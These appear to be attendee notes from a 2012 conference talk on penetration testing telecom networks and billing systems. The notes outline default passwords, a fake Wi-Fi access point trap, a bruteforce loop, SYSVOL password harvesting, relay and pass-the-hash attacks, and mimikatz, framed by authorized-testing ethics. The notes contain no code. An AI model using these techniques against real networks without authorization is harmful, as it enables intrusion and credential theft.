phdays.com, phdays.ru Moscow, 2012 Day2, Track1, 17:00 Sergey Gordeychik, How to hack a telecom and stay alive 2. Owning a billing (Lost 20 minutes of the talk) Lots of VPN VPN is good, but need GOOD configuration The lords of the net Admins! a large network = MANY admins web-accessible KVM/RDP many servers = password of admin never is lock-out policy TCP 1337 over SSL ShoutCast radio streaming server Location: an administrator workstation just search his email with word "password" WiFi access WEP instead of WPA reason = WPA is slow since WEP is fast, so fast was the password cracking as well :) found voip cisco call manager level 15 for the network Pentester tips don't miss anything on the perimeter a strange service not being able to fingerprint -> might be a very BIG hole in fact keep in mind 3rd party hosts use old-school tools and techniques sometimes old holes are found, when the newest threats are patched check the WEB necessary don't forget the admin side/aspects Subscribers Subs are WITHIN the perimeter of network many attacks are easier to perform from subs side General problems network access control weakness intransigent attacks protection of the equipment web applications for subscribers eg.: play online games, manage account, etc. Network access control errors scanned 192.168.x.x 22 ssh was open, though 23 telnet was closed 445 udp share smb was still open, though 445 TCP was closed some cisco had default passwords which subsequently has lead to some passport server passwords which gets us more cisco passwords etc Hosting local network for collocated/dedicated servers attack against infrastructure (DNS) eg: Secunia hacked via DNS spoofing shared hosting Network access control errors gprs/edge/3g, traditionally stick to NAT other clients are invisible this is not always true perhaps due to config errors in the subnet 10.x, other subscribers could be seen a lot of M2M unpatched devices (Kiosks) behind NAT with logic "behind NAT - unhackable" SNMP 'private' on a GGSN Joke => some barcode Joke captive portal (when credit expires on the net usage example) has LAMP but had mod_proxy -> used as a proxy -> leads to the backbone/technological network via the proxy –> pwn! Web portals and services for subscribers are often placed into the DMZ together with OTHER_SPECIAL servers Subs also reuse passwords or a flawed SSO is installed Eg: games server proxima CMS, path traversal + SQLi + configuration error = root found other 20 web apps on the same machine – all web apps used for subscriber related use/access Contractors perimeter level attacks require system access.vpn corporate policy are not applicable (in the proper sense) - just connect and get your work done eg: a host was looking for a wifi AP brought up fake AP the host connected to fake AP the host allowed guest access in windows the host had the distributive for DSL subs the password was in the distributive the password matched the production xDSL management software eg: some contractors are external – screenshot with Chinese cmd.exe window Pentester tips the laptop of the contractor is NOT a telecom good, IS a contractor good the subscriber data is NOT a telecom data so important to know what belongs to telecom, and what NOT we are ONLY searching for vulnerabilities MINIMALLY exploit the vuln we use ONLY our own resources for demos a fickle client client: enter the portal, abuse the leaked password send me the screenshot pentest: NO, here is the password, go enter yourself and check it contractors are never to be hacked! Playing inside changes are highly dynamic network some errors can cause failures and facilitate frauds Going ahead while inside the network find things to break? better is to: own the directory and own the net own the net net gets you traffic traffic gets you passwords own the directory directory gets you passwords etc Owning the NET equipment vulnerabilities cisco, huawei - is a real hassle to update/patch the vulnerabilities FORGOTTEN (!) systems – example: they found a switch – it was NON-configured! FUN part – NON-configured BUT uptime 2 years! pentesters configured it :) - "properly" configured! etc Example WPA-PSK for AP found Hard time to physically find the given AP Is inside the data center gives access directly to the telecom without any hacks Backups sometimes the backups of configuration are often pulled over the net just sniff and collect the password Scenario1 - bruteforce some default passwords work for a bootstrap-list of outlook web-access users once outlook web-access obtained gets us the list of users from the directory expand the list of users to bruteforce go back to step1 once inside the network, use NULL session to get the list of users, go back to step1 scenario4 - relay attacks don't forget to use cannot be conceptually patched by design of challenge-response, where there is no authentication of the server (like in kerberos) scenario5 - service desk again scenarioN 50% cases works well get into the sysvol share on the server any user on the net has auth to see it sometimes you find scripts with password hardcoded/changed in the script itself post-exploitaion Incognito - access token manipulation Pass-the-hash - for windows mimikatz into metasploit Some billing IT servers look like any other web-server with DB no-patch windows oracle -> scott/tiger, no patches at all IIS + ASP.NET IMPORTANT -> billing=confidential information of subs => ask the telecom to get you a similar test system which doesn't contain confidential data